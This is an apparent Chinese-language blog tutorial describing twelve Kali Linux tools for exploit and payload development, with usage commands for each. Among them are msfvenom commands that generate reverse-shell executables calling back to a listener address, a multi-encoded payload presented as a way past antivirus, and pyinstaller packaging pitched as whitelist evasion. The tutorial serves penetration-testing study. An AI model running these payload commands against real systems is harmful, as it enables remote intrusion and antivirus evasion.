kali基础介绍(Resource Development 资源开发)

文章目录

本文主要介绍 kali 的 Resource Development的相关工具的具体作用。本文仅限于日常学习和技术交流。不得利用文章涉及的技术点进行违法活动。

图中展示的是 Kali Linux 系统中"资源开发 "(Resource Development)分类下的 12个核心工具,主要用于漏洞利用代码编写、Shellcode 生成、程序逆向、漏洞数据库查询 等任务。这些工具是渗透测试人员在初始访问、执行、权限提升等攻击阶段的重要支撑,尤其在定制化攻击载荷开发中不可或缺。

(一)clang

作用 :C/C++/Objective-C 编译器前端,基于 LLVM 构建,用于编译本地程序或生成 shellcode。
功能

  • 支持多种语言:C、C++、Objective-C、OpenCL、CUDA 等。

  • 编译速度快、错误提示清晰、内存占用低。

  • 可跨平台编译(如为 ARM 架构生成代码)。

  • 常用于编译漏洞利用代码、编写自定义 shellcode。
    常用命令

  • 编译 C 程序:

    bash 复制代码
    clang hello.c -o hello
  • 生成 shellcode(结合汇编):

    bash 复制代码
    clang -c -o shellcode.o shellcode.s
  • 交叉编译(如为树莓派):

    bash 复制代码
    clang --target=arm-linux-gnueabihf -mcpu=cortex-a9 shellcode.c -o shellcode_arm

(二)clang++

作用 :Clang 的 C++ 编译器前端,功能与 clang 类似,专为 C++ 代码设计。
功能

  • 支持现代 C++ 标准(如 C++17/20)。

  • 可与 clang 协同工作,用于开发复杂漏洞利用框架。

  • 常用于编译 Metasploit 模块、自定义 payload。
    常用命令

  • 编译 C++ 程序:

    bash 复制代码
    clang++ main.cpp -o main
  • 静态链接:

    bash 复制代码
    clang++ main.cpp -static -o main_static

(三)generic_chunked

作用 :SPIKE 框架中的模糊测试工具,用于发送分块数据包,测试目标服务对分块传输编码的处理。
功能

  • 模拟 HTTP 分块传输,发送异常分块数据。
  • 用于发现 Web 服务器、代理、应用防火墙的解析漏洞。
  • 常用于 Web 漏洞挖掘(如 CVE-2011-3192 Apache 分块编码漏洞)。
    使用方式
  • 编写 SPIKE 脚本,调用 generic_chunked 发送恶意分块数据。
  • 结合模糊测试框架,自动化触发异常。

(四)generic_listen_tcp

作用 :SPIKE 框架中的 TCP 监听工具,用于接收并记录客户端连接。
功能

  • 监听指定端口,接收 TCP 连接。

  • 记录客户端发送的数据,辅助分析漏洞触发行为。

  • 常用于回调 shell、反向连接测试。
    使用方式

  • 启动监听:

    bash 复制代码
    generic_listen_tcp 4444
  • 配合恶意 payload,接收目标主机的连接请求。

(五)generic_send_tcp

作用 :SPIKE 框架中的 TCP 发送工具,用于向目标发送自定义 TCP 数据。
功能

  • 发送原始 TCP 数据包,支持模糊测试。

  • 可构造异常请求,测试服务稳定性。

  • 常用于协议模糊测试(如 FTP、SMTP、HTTP)。
    使用方式

  • 发送数据:

    bash 复制代码
    generic_send_tcp target.com 80 < request.spike
  • 结合 SPIKE 脚本,自动化发送变异数据。

(六)generic_send_udp

作用 :SPIKE 框架中的 UDP 发送工具,用于发送 UDP 数据包。
功能

  • 发送原始 UDP 数据包,支持模糊测试。

  • 用于测试 UDP 服务(如 DNS、DHCP、SNMP)的健壮性。
    使用方式

  • 发送 UDP 数据:

    bash 复制代码
    generic_send_udp target.com 53 < dns_fuzz.spike

(七)msf-nasm_shell

作用 :Metasploit 框架中的汇编/反汇编工具,用于生成和调试 x86 shellcode。
功能

  • 实时汇编:将汇编指令转换为机器码。

  • 反汇编:将十六进制 shellcode 还原为汇编指令。

  • 常用于编写、调试自定义 shellcode。
    使用方式

  • 启动:

    bash 复制代码
    msf-nasm_shell
  • 汇编指令:

    asm 复制代码
    xor eax, eax
  • 反汇编 shellcode:

    bash 复制代码
    \x31\xc0

(八)msfpc

作用 :Metasploit 命令行快捷启动器,用于快速生成、执行 payload。
功能

  • 图形化向导:引导用户选择目标平台、payload 类型。

  • 快速生成:一键生成可执行文件、脚本、Shellcode。

  • 支持多种输出格式(EXE、ELF、PHP、Python 等)。
    使用方式

  • 启动向导:

    bash 复制代码
    msfpc
  • 选择平台(如 Windows)、payload(如 reverse_tcp),生成 EXE。

(九)msfvenom

作用 :Metasploit 的 payload 生成与编码工具,用于创建免杀、跨平台的攻击载荷。
功能

  • 生成多种 payload(如 reverse shell、bind shell)。

  • 支持编码、混淆、加密,绕过杀毒软件。

  • 可嵌入到合法程序中,实现 DLL 注入、进程 hollowing。
    常用命令

  • 生成 Linux reverse shell:

    bash 复制代码
    msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf
  • 生成 Windows EXE:

    bash 复制代码
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe
  • 多重编码:

    bash 复制代码
    msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 5 -f exe -o shell_encoded.exe

(十)pyinstaller

作用 :Python 程序打包工具,将 Python 脚本打包为独立可执行文件。
功能

  • 支持 Windows、Linux、macOS。

  • 可打包为单文件、目录模式,支持图标替换。

  • 常用于将 Python 编写的 payload 打包为 EXE,绕过白名单。
    常用命令

  • 打包单文件:

    bash 复制代码
    pyinstaller --onefile script.py
  • 指定图标:

    bash 复制代码
    pyinstaller --onefile --icon=icon.ico script.py

(十一)radare2

作用 :开源的逆向工程框架,支持二进制分析、调试、反汇编。
功能

  • 支持多种架构(x86、ARM、MIPS、PowerPC 等)。

  • 提供命令行界面,支持脚本扩展。

  • 可分析 ELF、PE、Mach-O 等格式文件。
    常用命令

  • 分析二进制:

    bash 复制代码
    r2 /path/to/binary
  • 反汇编主函数:

    bash 复制代码
    pdf @ main
  • 交互式调试:

    bash 复制代码
    doo

(十二)searchsploit

作用 :本地漏洞数据库查询工具,用于快速查找公开漏洞利用代码。
功能

  • 内置 Exploit-DB 数据库,支持离线搜索。

  • 可按关键词、CVE 编号、平台、语言搜索。

  • 支持复制漏洞文件到当前目录。
    常用命令

  • 搜索关键词:

    bash 复制代码
    searchsploit vsftpd
  • 按 CVE 搜索:

    bash 复制代码
    searchsploit CVE-2011-2523 # 该漏洞已修复,本地搜索大概率搜不到了
  • 复制漏洞文件:

    bash 复制代码
    searchsploit -m 12345
相关推荐
2401_8734794013 小时前
企业安全团队如何配合公安协查?IP查询在电子取证中的技术实践
tcp/ip·安全·网络安全·php
网安情报局14 小时前
如何选择合适的AI大模型:快快云安全AI大模型聚合平台全解析
人工智能·网络安全·ai大模型
忡黑梨16 小时前
eNSP_从直连到BGP全网互通
c语言·网络·数据结构·python·算法·网络安全
其实防守也摸鱼17 小时前
带你了解与配置phpmyadmin
笔记·安全·网络安全·pdf·编辑器·工具·调试
菩提小狗17 小时前
每日安全情报报告 · 2026-04-27
网络安全·漏洞·cve·安全情报·每日安全
Chengbei1119 小时前
面向红队的 AI 赋能全场景流量分析仪 网页 / APP / 终端 / IoT 全域 HTTPS 抓包解密利器
人工智能·物联网·网络协议·web安全·网络安全·https·系统安全
菩提小狗20 小时前
每日安全情报报告 · 2026-04-29
网络安全·漏洞·cve·安全情报·每日安全
FORCECON121 小时前
力控船舶智能运营,机舱监控IEWS/能效管理IEES/网络安全IACS,软硬件一体化解决方案
网络安全·scada·船舶·能效管理·机舱监控
漠月瑾-西安1 天前
软件忘了“擦黑板”:一次内核信息泄露事件(CVE-2024-49997)的深度剖析
网络安全·linux内核·内核安全·信息泄露·内存安全·cve漏洞分析
枷锁—sha2 天前
【CTFshow-pwn系列】03_栈溢出【pwn 073】详解:静态编译下的自动化 ROP 链构建
网络·汇编·笔记·安全·网络安全·自动化